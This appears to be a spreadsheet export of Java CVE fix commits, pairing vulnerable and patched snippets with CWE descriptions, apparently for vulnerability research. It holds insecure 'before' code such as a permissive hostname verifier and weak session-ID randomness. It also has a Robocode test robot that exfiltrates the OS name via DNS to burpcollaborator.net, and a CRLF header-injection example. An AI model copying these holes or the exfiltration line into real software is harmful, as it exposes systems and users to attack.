    <t>https://github.com/facebook/buck/commit/8c5500981812564877bd122c0f8fab48d3528ddf</t>
  </si>
  <si>
    <t>ParserCacheCommand.java</t>
  </si>
  <si>
    <t>8c5500981812564877bd122c0f8fab48d3528ddf</t>
  </si>
  <si>
    <t xml:space="preserve">        try (ObjectInputStream ois = new ObjectInputStream(zipis)) {
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.facebook.buck.parser.ParserStateObjectInputStream;
        try (ObjectInputStream ois = new ParserStateObjectInputStream(zipis)) {
</t>
  </si>
  <si>
    <t>Prevent deserialization of random objectsSummary:
Fixed security issue with buck parser-cache command.
This diff prevent deserialization of random objects.
Reviewed By: jtorkkola
fbshipit-source-id: 24e8221</t>
  </si>
  <si>
    <t>ParserStateObjectInputStream.java</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * Copyright 2013-present Facebook, Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may
 * not use this file except in compliance with the License. You may obtain
 * a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0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 under the License.
 */
package com.facebook.buck.parser;
import com.facebook.buck.parser.thrift.RemoteDaemonicParserState;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.util.HashSet;
import java.util.Set;
/** A ObjectInputStream that will deserialize only RemoteDaemonicParserState. */
public class ParserStateObjectInputStream extends ObjectInputStream {
  private Set&lt;String&gt; whitelist;
  public ParserStateObjectInputStream(InputStream inputStream) throws IOException {
    super(inputStream);
    whitelist = new HashSet&lt;&gt;();
    whitelist.add(RemoteDaemonicParserState.class.getName());
  }
  @Override
  protected Class&lt;?&gt; resolveClass(ObjectStreamClass desc)
      throws IOException, ClassNotFoundException {
    if (!whitelist.contains(desc.getName())) {
      throw new InvalidClassException(desc.getName(), "Can't deserialize this class");
    }
    return super.resolveClass(desc);
  }
}
</t>
  </si>
  <si>
    <t>CVE-2018-8038</t>
  </si>
  <si>
    <t>https://github.com/apache/cxf-fediz/commit/b6ed9865d0614332fa419fe4b6d0fe81bc2e660d</t>
  </si>
  <si>
    <t>DOMUtils.java</t>
  </si>
  <si>
    <t>b6ed9865d0614332fa419fe4b6d0fe81bc2e660d</t>
  </si>
  <si>
    <t xml:space="preserve">    
</t>
  </si>
  <si>
    <t xml:space="preserve">            DBF.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
</t>
  </si>
  <si>
    <t>Make sure DocTypes are disallowed</t>
  </si>
  <si>
    <t>CWE-755</t>
  </si>
  <si>
    <t>CVE-2018-8039</t>
  </si>
  <si>
    <t>https://github.com/apache/cxf/commit/fae6fabf9bd7647f5e9cb68897a7d72b545b741b</t>
  </si>
  <si>
    <t>AllowAllHostnameVerifier.java</t>
  </si>
  <si>
    <t>fae6fabf9bd7647f5e9cb68897a7d72b545b741b</t>
  </si>
  <si>
    <t xml:space="preserve">    public boolean verify(final String host, final String certHostname) {
        return certHostname != null &amp;&amp; !certHostname.isEmpty();
    }
</t>
  </si>
  <si>
    <t>Fix hostname verification using the deprecated SSL stack</t>
  </si>
  <si>
    <t>Improper Handling of Exceptional Conditions</t>
  </si>
  <si>
    <t>The software does not handle or incorrectly handles an exceptional condition.</t>
  </si>
  <si>
    <t>HttpsURLConnectionFactory.java</t>
  </si>
  <si>
    <t xml:space="preserve">                            return true;
</t>
  </si>
  <si>
    <t xml:space="preserve">                            return false;
</t>
  </si>
  <si>
    <t>DefaultHostnameVerifier.java</t>
  </si>
  <si>
    <t xml:space="preserve">    public boolean verify(final String host, final String certHostname) {
        try {
            matchCN(host, certHostname, this.publicSuffixMatcher);
            return true;
        } catch (SSLException ex) {
            if (LOG.isLoggable(Level.FINE)) {
                LOG.log(Level.FINE, ex.getMessage(), ex);
            }
            return false;
        }
    }
</t>
  </si>
  <si>
    <t>HostnameVerificationDeprecatedServer.java</t>
  </si>
  <si>
    <t xml:space="preserve">/**
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package org.apache.cxf.systest.https.hostname;
import java.net.URL;
import org.apache.cxf.Bus;
import org.apache.cxf.BusFactory;
import org.apache.cxf.bus.spring.SpringBusFactory;
import org.apache.cxf.testutil.common.AbstractBusTestServerBase;
public class HostnameVerificationDeprecatedServer extends AbstractBusTestServerBase {
    public HostnameVerificationDeprecatedServer() {
    }
    protected void run()  {
        URL busFile = HostnameVerificationDeprecatedServer.class.getResource("hostname-server-bethal.xml");
        Bus busLocal = new SpringBusFactory().createBus(busFile);
        BusFactory.setDefaultBus(busLocal);
        setBus(busLocal);
        try {
            new HostnameVerificationDeprecatedServer();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
</t>
  </si>
  <si>
    <t>CVE-2018-8088</t>
  </si>
  <si>
    <t>https://github.com/qos-ch/slf4j/commit/d2b27fba88e983f921558da27fc29b5f5d269405</t>
  </si>
  <si>
    <t>EventData.java</t>
  </si>
  <si>
    <t>d2b27fba88e983f921558da27fc29b5f5d269405</t>
  </si>
  <si>
    <t xml:space="preserve"> * 
 * @deprecated Due to a security vulnerability, this class will be removed without replacement.
</t>
  </si>
  <si>
    <t>fix SLF4J-431</t>
  </si>
  <si>
    <t>CVE-2018-9159</t>
  </si>
  <si>
    <t>https://github.com/perwendel/spark/commit/030e9d00125cbd1ad759668f85488aba1019c668</t>
  </si>
  <si>
    <t>ClassPathResource.java</t>
  </si>
  <si>
    <t>030e9d00125cbd1ad759668f85488aba1019c668</t>
  </si>
  <si>
    <t xml:space="preserve">        Assert.state(doesNotContainFileColon(path), "Path must not contain 'file:'");
    private static boolean doesNotContainFileColon(String path) {
        return !path.contains("file:");
                thisLoader.equals(otherLoader) &amp;&amp;
                this.clazz.equals(otherRes.clazz));
</t>
  </si>
  <si>
    <t xml:space="preserve">import spark.utils.ResourceUtils;
        Assert.isTrue(isValid(path), "Path is not valid");
    private static boolean isValid(final String path) {
        return !isInvalidPath(path);
    }
    private static boolean isInvalidPath(String path) {
        if (path.contains("WEB-INF") || path.contains("META-INF")) {
            return true;
        }
        if (path.contains(":/")) {
            String relativePath = (path.charAt(0) == '/' ? path.substring(1) : path);
            if (ResourceUtils.isUrl(relativePath) || relativePath.startsWith("url:")) {
                return true;
            }
        }
        if (path.contains("")) {
            path = StringUtils.cleanPath(path);
            if (path.contains("../")) {
                return true;
            }
        }
        return false;
                    thisLoader.equals(otherLoader) &amp;&amp;
                    this.clazz.equals(otherRes.clazz));
</t>
  </si>
  <si>
    <t>Fix for #981, patch 2 (#988)</t>
  </si>
  <si>
    <t>StaticResources.java</t>
  </si>
  <si>
    <t xml:space="preserve">import static spark.Spark.staticFileLocation;
        staticFileLocation("/public");
</t>
  </si>
  <si>
    <t xml:space="preserve">import static spark.Spark.staticFiles;
        staticFiles.location("/public");
</t>
  </si>
  <si>
    <t>https://github.com/perwendel/spark/commit/a221a864db28eb736d36041df2fa6eb8839fc5cd</t>
  </si>
  <si>
    <t>a221a864db28eb736d36041df2fa6eb8839fc5cd</t>
  </si>
  <si>
    <t>Fix for #981, patch 2</t>
  </si>
  <si>
    <t>https://github.com/perwendel/spark/commit/ce9e11517eca69e58ed4378d1e47a02bd06863cc</t>
  </si>
  <si>
    <t>ce9e11517eca69e58ed4378d1e47a02bd06863cc</t>
  </si>
  <si>
    <t xml:space="preserve">     *
     * @return if exists.
     *
     * @return the input stream.
     *
     * @return the url.
     * @see spark.utils.StringUtils#applyRelativePath(String, String)
     *
     * @see spark.utils.StringUtils#getFilename(String)
     *
                    thisLoader.equals(otherLoader) &amp;&amp;
                    this.clazz.equals(otherRes.clazz));
</t>
  </si>
  <si>
    <t xml:space="preserve">        Assert.state(doesNotContainFileColon(path), "Path must not contain 'file:'");
    private static boolean doesNotContainFileColon(String path) {
        return !path.contains("file:");
    }
     * @return if exists.
     * @return the input stream.
     * @return the url.
     * @see spark.utils.StringUtils#applyRelativePath(String, String)
     * @see spark.utils.StringUtils#getFilename(String)
                thisLoader.equals(otherLoader) &amp;&amp;
                this.clazz.equals(otherRes.clazz));
</t>
  </si>
  <si>
    <t>Fix for #981</t>
  </si>
  <si>
    <t>CVE-2019-10648</t>
  </si>
  <si>
    <t>https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd#diff-0296a8f9d4a509789f4dc4f052d9c36f</t>
  </si>
  <si>
    <t>RobocodeSecurityManager.java</t>
  </si>
  <si>
    <t>836c84635e982e74f2f2771b2c8640c3a34221bd#diff-0296a8f9d4a509789f4dc4f052d9c36f</t>
  </si>
  <si>
    <t xml:space="preserve">			throw new AccessControlException(message);
			throw new AccessControlException(message);
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.net.SocketPermission;
import java.security.Permission;
			throw new SecurityException(message);
			throw new SecurityException(message);
    public void checkPermission(Permission perm) {
		if (RobocodeProperties.isSecurityOff()) {
			return;
		}
		Thread c = Thread.currentThread();
		if (isSafeThread(c)) {
			return;
		}
        super.checkPermission(perm);
        if (perm instanceof SocketPermission) {
    		IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c);
        	String message = "Using socket is not allowed";
        	robotProxy.punishSecurityViolation(message);
            throw new SecurityException(message);
        }
    }
</t>
  </si>
  <si>
    <t>Bug-406: DNS interaction is not blocked by Robocode's security manage……r + test(s) to verify the fix</t>
  </si>
  <si>
    <t>DnsAttack.java</t>
  </si>
  <si>
    <t xml:space="preserve">package tested.robots;
public class DnsAttack extends robocode.Robot {
	static {
		try {
			new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".")
					+ ".randomsubdomain.burpcollaborator.net").openStream();
		} catch (Exception e) {
		}
	}
	public void run() {
		for (;;) {
			ahead(100);
			back(100);
		}
	}
}
</t>
  </si>
  <si>
    <t>CWE-338</t>
  </si>
  <si>
    <t>CVE-2019-11808</t>
  </si>
  <si>
    <t>https://github.com/ratpack/ratpack/commit/f2b63eb82dd71194319fd3945f5edf29b8f3a42d</t>
  </si>
  <si>
    <t>SessionModule.java</t>
  </si>
  <si>
    <t>f2b63eb82dd71194319fd3945f5edf29b8f3a42d</t>
  </si>
  <si>
    <t xml:space="preserve">  @Singleton
</t>
  </si>
  <si>
    <t>Use UUID directly for generating session IDs</t>
  </si>
  <si>
    <t>Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)</t>
  </si>
  <si>
    <t>The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.</t>
  </si>
  <si>
    <t>When a non-cryptographic PRNG is used in a cryptographic context, it can expose the cryptography to certain types of attacks. Often a pseudo-random number generator (PRNG) is not designed for cryptography. Sometimes a mediocre source of randomness is sufficient or preferable for algorithms that use random numbers. Weak generators generally take less processing power and/or do not use the precious, finite, entropy sources on a system. While such PRNGs might have very useful features, these same features could be used to break the cryptography.</t>
  </si>
  <si>
    <t>DefaultSessionIdGenerator.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.concurrent.ThreadLocalRandom;
    ThreadLocalRandom random = ThreadLocalRandom.current();
    UUID uuid = new UUID(random.nextLong(), random.nextLong());
    return AsciiString.of(uuid.toString());
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.google.inject.Singleton;
@Singleton
    return AsciiString.cached(UUID.randomUUID().toString());
</t>
  </si>
  <si>
    <t>CWE-770</t>
  </si>
  <si>
    <t>CVE-2019-11938</t>
  </si>
  <si>
    <t>https://github.com/facebook/fbthrift/commit/08c2d412adb214c40bb03be7587057b25d053030</t>
  </si>
  <si>
    <t>TBinaryProtocol.java</t>
  </si>
  <si>
    <t>08c2d412adb214c40bb03be7587057b25d053030</t>
  </si>
  <si>
    <t xml:space="preserve">    ensureContainerHasEnough(size, TType.BYTE);
    ensureContainerHasEnough(size, TType.BYTE);
</t>
  </si>
  <si>
    <t>Java: Check the size of the remaining frame before deserializing a st……ring
Summary:
In order to avoid over-allocating memory for malformed or truncated frame, we
ensure that we have enough data in the current frame.
This is a partial fix for CVE-2019-11938.
Reviewed By: vitaut
Differential Revision: D14505601
fbshipit-source-id: c90f248828b067a3a5debcc8df6a3f4e9da6d195</t>
  </si>
  <si>
    <t>Allocation of Resources Without Limits or Throttling</t>
  </si>
  <si>
    <t>The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.</t>
  </si>
  <si>
    <t>Code frequently has to work with limited resources, so programmers must be careful to ensure that resources are not consumed too quickly, or too easily. Without use of quotas, resource limits, or other protection mechanisms, it can be easy for an attacker to consume many resources by rapidly making many requests, or causing larger resources to be used than is needed. When too many resources are allocated, or if a single resource is too large, then it can prevent the code from working correctly, possibly leading to a denial of service.</t>
  </si>
  <si>
    <t>TCompactProtocol.java</t>
  </si>
  <si>
    <t xml:space="preserve">    ensureContainerHasEnough(length, TType.BYTE);
</t>
  </si>
  <si>
    <t>https://github.com/facebook/fbthrift/commit/71c97ffdcb61cccf1f8267774e873e21ebd3ebd3</t>
  </si>
  <si>
    <t>71c97ffdcb61cccf1f8267774e873e21ebd3ebd3</t>
  </si>
  <si>
    <t xml:space="preserve">    return new TMap(readByte(), readByte(), readI32());
    return new TList(readByte(), readI32());
    return new TSet(readByte(), readI32());
</t>
  </si>
  <si>
    <t xml:space="preserve">    byte keyType = readByte();
    byte valueType = readByte();
    int size = readI32();
    ensureMapHasEnough(size, keyType, valueType);
    return new TMap(keyType, valueType, size);
    byte type = readByte();
    int size = readI32();
    ensureContainerHasEnough(size, type);
    return new TList(type, size);
    byte type = readByte();
    int size = readI32();
    ensureContainerHasEnough(size, type);
    return new TSet(type, size);
  @Override
  protected int typeMinimumSize(byte type) {
    switch (type &amp; 0x0f) {
      case TType.BOOL:
      case TType.BYTE:
        return 1;
      case TType.I16:
        return 2;
      case TType.I32:
      case TType.FLOAT:
        return 4;
      case TType.DOUBLE:
      case TType.I64:
        return 8;
      case TType.STRING:
        return 4;
      case TType.LIST:
      case TType.SET:
        // type (1 byte) + size (4 bytes)
        return 1 + 4;
      case TType.MAP:
        // key type (1 byte) + value type (1 byte) + size (4 bytes)
        return 1 + 1 + 4;
      case TType.STRUCT:
        return 1;
      default:
        throw new TProtocolException(
            TProtocolException.INVALID_DATA, "Unexpected data type " + (byte) (type &amp; 0x0f));
    }
  }
</t>
  </si>
  <si>
    <t>Java: Check the size of the remaining frame before deserializing coll……ection
Summary:
In order to avoid over-allocating memory for malformed or truncated frame, we ensure that we have enough data (we only check for the lower bound) in the current frame.
This is a partial fix for CVE-2019-11938.
Reviewed By: vitaut
Differential Revision: D14500775
fbshipit-source-id: ca8b38965514d6319addcb72c8999a6854a94a88</t>
  </si>
  <si>
    <t xml:space="preserve">    return new TMap(
        getTType((byte) (keyAndValueType &gt;&gt; 4)), getTType((byte) (keyAndValueType &amp; 0xf)), size);
</t>
  </si>
  <si>
    <t xml:space="preserve">    byte keyType = getTType((byte) (keyAndValueType &gt;&gt; 4));
    byte valueType = getTType((byte) (keyAndValueType &amp; 0xf));
    if (size &gt; 0) {
      ensureMapHasEnough(size, keyType, valueType);
    }
    return new TMap(keyType, valueType, size);
    ensureContainerHasEnough(size, type);
  @Override
  protected int typeMinimumSize(byte type) {
    switch (type &amp; 0x0f) {
      case TType.BOOL:
      case TType.BYTE:
      case TType.I16: // because of variable length encoding
      case TType.I32: // because of variable length encoding
      case TType.I64: // because of variable length encoding
        return 1;
      case TType.FLOAT:
        return 4;
      case TType.DOUBLE:
        return 8;
      case TType.STRING:
      case TType.STRUCT:
      case TType.MAP:
      case TType.SET:
      case TType.LIST:
      case TType.ENUM:
        return 1;
      default:
        throw new TProtocolException(
            TProtocolException.INVALID_DATA, "Unexpected data type " + (byte) (type &amp; 0x0f));
    }
  }
</t>
  </si>
  <si>
    <t>TProtocol.java</t>
  </si>
  <si>
    <t xml:space="preserve">  /** Return the minimum size of a type */
  protected int typeMinimumSize(byte type) {
    return 1;
  }
  protected void ensureContainerHasEnough(int size, byte type) {
    int minimumExpected = size * typeMinimumSize(type);
    ensureHasEnoughBytes(minimumExpected);
  }
  protected void ensureMapHasEnough(int size, byte keyType, byte valueType) {
    int minimumExpected = size * (typeMinimumSize(keyType) + typeMinimumSize(valueType));
    ensureHasEnoughBytes(minimumExpected);
  }
  private void ensureHasEnoughBytes(int minimumExpected) {
    int remaining = trans_.getBytesRemainingInBuffer();
    if (remaining &lt; 0) {
      return; // Some transport are not buffered
    }
    if (remaining &lt; minimumExpected) {
      throw new TProtocolException(
          TProtocolException.INVALID_DATA,
          "Not enough bytes to read the entire message, the data appears to be truncated");
    }
  }
</t>
  </si>
  <si>
    <t>TProtocolDecorator.java</t>
  </si>
  <si>
    <t xml:space="preserve">  @Override
  protected int typeMinimumSize(byte type) {
    return concreteProtocol.typeMinimumSize(type);
  }
</t>
  </si>
  <si>
    <t>CWE-284</t>
  </si>
  <si>
    <t>CVE-2019-12395</t>
  </si>
  <si>
    <t>https://github.com/webbukkit/dynmap/commit/641f142cd3ccdcbfb04eda3059be22dd9ed93783</t>
  </si>
  <si>
    <t>MapStorageResourceHandler.java</t>
  </si>
  <si>
    <t>641f142cd3ccdcbfb04eda3059be22dd9ed93783</t>
  </si>
  <si>
    <t xml:space="preserve">        if(core.getLoginRequired()
            &amp;&amp; request.getSession(true).getAttribute(LoginServlet.USERID_ATTRIB) == null){
            response.sendError(HttpStatus.UNAUTHORIZED_401);
            return;
        }
</t>
  </si>
  <si>
    <t>Merge pull request #2475 from Ry0taK/v3.0Fix required login bypass vulnerability</t>
  </si>
  <si>
    <t>Improper Access Control</t>
  </si>
  <si>
    <t>The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor.</t>
  </si>
  <si>
    <t>Access control involves the use of several protection mechanisms such as: Authentication (proving the identity of an actor) Authorization (ensuring that a given actor can access a resource), and Accountability (tracking of activities that were performed) When any mechanism is not applied or otherwise fails, attackers can compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc. There are two distinct behaviors that can introduce access control weaknesses: Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for either the user or the resource (for example, setting a password file to be world-writable, or giving administrator capabilities to a guest user). This action could be performed by the program or the administrator. Enforcement: the mechanism contains errors that prevent it from properly enforcing the specified access control requirements (e.g., allowing the user to specify their own privileges, or allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs within the program itself, in that it does not actually enforce the intended security policy that the administrator specifies.</t>
  </si>
  <si>
    <t>CVE-2019-12741</t>
  </si>
  <si>
    <t>https://github.com/jamesagnew/hapi-fhir/commit/8f41159eb147eeb964cad68b28eff97acac6ea9a</t>
  </si>
  <si>
    <t>BaseController.java</t>
  </si>
  <si>
    <t>8f41159eb147eeb964cad68b28eff97acac6ea9a</t>
  </si>
  <si>
    <t xml:space="preserve">import org.thymeleaf.TemplateEngine;
		theModel.put("serverId", serverId);
		theModel.put("base", serverBase);
		theModel.put("baseName", serverName);
		theModel.put("apiKey", apiKey);
		theModel.put("resourceName", defaultString(theRequest.getResource()));
		theModel.put("encoding", theRequest.getEncoding());
		theModel.put("pretty", theRequest.getPretty());
		theModel.put("_summary", theRequest.get_summary());
</t>
  </si>
  <si>
    <t xml:space="preserve">		theModel.put("serverId", sanitizeInput(serverId));
		theModel.put("base", sanitizeInput(serverBase));
		theModel.put("baseName", sanitizeInput(serverName));
		theModel.put("apiKey", sanitizeInput(apiKey));
		theModel.put("resourceName", sanitizeInput(defaultString(theRequest.getResource())));
		theModel.put("encoding", sanitizeInput(theRequest.getEncoding()));
		theModel.put("pretty", sanitizeInput(theRequest.getPretty()));
		theModel.put("_summary", sanitizeInput(theRequest.get_summary()));
	private static String sanitizeInput(String theString) {
		String retVal = theString;
		if (retVal != null) {
			for (int i = 0; i &lt; retVal.length(); i++) {
				char nextChar = retVal.charAt(i);
				switch (nextChar) {
					case '\'':
					case '"':
					case '&lt;':
					case '&gt;':
						retVal = retVal.replace(nextChar, '_');
				}
			}
		}
		return retVal;
	}
</t>
  </si>
  <si>
    <t>Fix a potential security vulneability in the testpage overlay</t>
  </si>
  <si>
    <t>CWE-200</t>
  </si>
  <si>
    <t>CVE-2019-14439</t>
  </si>
  <si>
    <t>https://github.com/FasterXML/jackson-databind/commit/ad418eeb974e357f2797aef64aa0e3ffaaa6125b</t>
  </si>
  <si>
    <t>ad418eeb974e357f2797aef64aa0e3ffaaa6125b</t>
  </si>
  <si>
    <t xml:space="preserve">        // [databind#2387]: EHCache
        s.add("net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup");
        // [databind#2389]: logback/jndi
        s.add("ch.qos.logback.core.db.JNDIConnectionSource");
</t>
  </si>
  <si>
    <t>Backport #2387, #2389 fixes</t>
  </si>
  <si>
    <t>Exposure of Sensitive Information to an Unauthorized Actor</t>
  </si>
  <si>
    <t>The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.</t>
  </si>
  <si>
    <t>There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as personal messages, financial data, health records, geographic location, or contact details system status and environment, such as the operating system and installed packages business secrets and intellectual property network status and configuration the product's own code or internal state metadata, e.g. logging of connections or message headers indirect information, such as a discrepancy between two internal operations that can be observed by an outsider Information might be sensitive to different parties, each of which may have their own expectations for whether the information should be protected. These parties include: the product's own users people or organizations whose information is created or used by the product, even if they are not direct product users the product's administrators, including the admins of the system(s) and/or networks on which the product operates the developer Information exposures can occur in different ways: the code explicitly inserts sensitive information into resources or messages that are intentionally made accessible to unauthorized actors, but should not contain the information - i.e., the information should have been scrubbed or sanitized a different weakness or mistake indirectly inserts the sensitive information into resources, such as a web script error revealing the full system path of the program. the code manages resources that intentionally contain sensitive information, but the resources are unintentionally made accessible to unauthorized actors. In this case, the information exposure is resultant - i.e., a different weakness enabled the access to the information in the first place. It is common practice to describe any loss of confidentiality as an information exposure, but this can lead to overuse of CWE-200 in CWE mapping. From the CWE perspective, loss of confidentiality is a technical impact that can arise from dozens of different weaknesses, such as insecure file permissions or out-of-bounds read. CWE-200 and its lower-level descendants are intended to cover the mistakes that occur in behaviors that explicitly manage, store, transfer, or cleanse sensitive information.</t>
  </si>
  <si>
    <t>CWE-798</t>
  </si>
  <si>
    <t>CVE-2019-14837</t>
  </si>
  <si>
    <t>https://github.com/keycloak/keycloak/commit/9a7c1a91a59ab85e7f8889a505be04a71580777f</t>
  </si>
  <si>
    <t>ClientManager.java</t>
  </si>
  <si>
    <t>9a7c1a91a59ab85e7f8889a505be04a71580777f</t>
  </si>
  <si>
    <t xml:space="preserve">            user.setEmail(username + "@placeholder.org");
            serviceAccountUser.setEmail(username + "@placeholder.org");
</t>
  </si>
  <si>
    <t>KEYCLOAK-10780 Stop creating placeholder e-mails for service accounts (……#228)</t>
  </si>
  <si>
    <t>Use of Hard-coded Credentials</t>
  </si>
  <si>
    <t>The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.</t>
  </si>
  <si>
    <t>Hard-coded credentials typically create a significant hole that allows an attacker to bypass the authentication that has been configured by the software administrator. This hole might be difficult for the system administrator to detect. Even if detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations: Inbound: the software contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials. Outbound: the software connects to another system or component, and it contains hard-coded credentials for connecting to that component. In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the software. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the software will have the same password, even across different organizations, this enables massive attacks such as worms to take place. The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end software. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple.</t>
  </si>
  <si>
    <t>CVE-2019-16370</t>
  </si>
  <si>
    <t>https://github.com/gradle/gradle/commit/425b2b7a50cd84106a77cdf1ab665c89c6b14d2f</t>
  </si>
  <si>
    <t>PgpSignatory.java</t>
  </si>
  <si>
    <t>425b2b7a50cd84106a77cdf1ab665c89c6b14d2f</t>
  </si>
  <si>
    <t xml:space="preserve">            PGPSignatureGenerator generator = new PGPSignatureGenerator(new BcPGPContentSignerBuilder(secretKey.getPublicKey().getAlgorithm(), PGPUtil.SHA1));
</t>
  </si>
  <si>
    <t xml:space="preserve">            PGPSignatureGenerator generator = new PGPSignatureGenerator(new BcPGPContentSignerBuilder(secretKey.getPublicKey().getAlgorithm(), PGPUtil.SHA512));
</t>
  </si>
  <si>
    <t>Merge pull request #10543 from vlsi/sign_hashsigning plugin: use SHA512 instead of SHA1 when signing artifacts</t>
  </si>
  <si>
    <t>CWE-74</t>
  </si>
  <si>
    <t>CVE-2019-16771</t>
  </si>
  <si>
    <t>https://github.com/line/armeria/commit/b597f7a865a527a84ee3d6937075cfbb4470ed20</t>
  </si>
  <si>
    <t>HttpHeaderNames.java</t>
  </si>
  <si>
    <t>b597f7a865a527a84ee3d6937075cfbb4470ed20</t>
  </si>
  <si>
    <t xml:space="preserve">        return cached != null ? cached : AsciiString.cached(lowerCased);
        return cached != null ? cached : lowerCased;
    private static AsciiString create(String name) {
        return AsciiString.cached(Ascii.toLowerCase(name));
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.BitSet;
import com.google.common.math.IntMath;
    private static final int PROHIBITED_NAME_CHAR_MASK = ~63;
    private static final BitSet PROHIBITED_NAME_CHARS = new BitSet(~PROHIBITED_NAME_CHAR_MASK + 1);
    private static final String[] PROHIBITED_NAME_CHAR_NAMES = new String[~PROHIBITED_NAME_CHAR_MASK + 1];
    static {
        PROHIBITED_NAME_CHARS.set(0);
        PROHIBITED_NAME_CHARS.set('\t');
        PROHIBITED_NAME_CHARS.set('\n');
        PROHIBITED_NAME_CHARS.set(0xB);
        PROHIBITED_NAME_CHARS.set('\f');
        PROHIBITED_NAME_CHARS.set('\r');
        PROHIBITED_NAME_CHARS.set(' ');
        PROHIBITED_NAME_CHARS.set(',');
        PROHIBITED_NAME_CHARS.set(':');
        PROHIBITED_NAME_CHARS.set(';');
        PROHIBITED_NAME_CHARS.set('=');
        PROHIBITED_NAME_CHAR_NAMES[0] = "&lt;NUL&gt;";
        PROHIBITED_NAME_CHAR_NAMES['\t'] = "&lt;TAB&gt;";
        PROHIBITED_NAME_CHAR_NAMES['\n'] = "&lt;LF&gt;";
        PROHIBITED_NAME_CHAR_NAMES[0xB] = "&lt;VT&gt;";
        PROHIBITED_NAME_CHAR_NAMES['\f'] = "&lt;FF&gt;";
        PROHIBITED_NAME_CHAR_NAMES['\r'] = "&lt;CR&gt;";
        PROHIBITED_NAME_CHAR_NAMES[' '] = "&lt;SP&gt;";
        PROHIBITED_NAME_CHAR_NAMES[','] = ",";
        PROHIBITED_NAME_CHAR_NAMES[':'] = ":";
        PROHIBITED_NAME_CHAR_NAMES[';'] = ";";
        PROHIBITED_NAME_CHAR_NAMES['='] = "=";
    }
    private static AsciiString create(String name) {
        return AsciiString.cached(Ascii.toLowerCase(name));
    }
     *
     * @throws IllegalArgumentException if the specified {@code name} is not a valid header name.
        if (cached != null) {
            return cached;
        }
        return validate(AsciiString.cached(lowerCased));
     *
     * @throws IllegalArgumentException if the specified {@code name} is not a valid header name.
        if (cached != null) {
            return cached;
        }
        return validate(lowerCased);
    private static AsciiString validate(AsciiString name) {
        if (name.isEmpty()) {
            throw new IllegalArgumentException("malformed header name: &lt;EMPTY&gt;");
        }
        final int lastIndex;
        try {
            lastIndex = name.forEachByte(value -&gt; {
                if ((value &amp; PROHIBITED_NAME_CHAR_MASK) != 0) { // value &gt;= 64
                    return true;
                }
                // value &lt; 64
                return !PROHIBITED_NAME_CHARS.get(value);
            });
        } catch (Exception e) {
            throw new Error(e);
        }
        if (lastIndex &gt;= 0) {
            throw new IllegalArgumentException(malformedHeaderNameMessage(name));
        }
        return name;
    }
    private static String malformedHeaderNameMessage(AsciiString name) {
        final StringBuilder buf = new StringBuilder(IntMath.saturatedAdd(name.length(), 64));
        buf.append("malformed header name: ");
        final int nameLength = name.length();
        for (int i = 0; i &lt; nameLength; i++) {
            final char ch = name.charAt(i);
            if (PROHIBITED_NAME_CHARS.get(ch)) {
                buf.append(PROHIBITED_NAME_CHAR_NAMES[ch]);
            } else {
                buf.append(ch);
            }
        }
        return buf.toString();
</t>
  </si>
  <si>
    <t>Merge pull request from GHSA-35fr-h7jr-hh86Motivation:
An `HttpService` can produce a malformed HTTP response when a user
specified a malformed HTTP header values, such as:
    ResponseHeaders.of(HttpStatus.OK
                       "my-header", "foo\r\nbad-header: bar");
Modification:
- Add strict header value validation to `HttpHeadersBase`
- Add strict header name validation to `HttpHeaderNames.of()`, which is
  used by `HttpHeadersBase`.
Result:
- It is not possible anymore to send a bad header value which can be
  misused for sending additional headers or injecting arbitrary content.</t>
  </si>
  <si>
    <t>Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')</t>
  </si>
  <si>
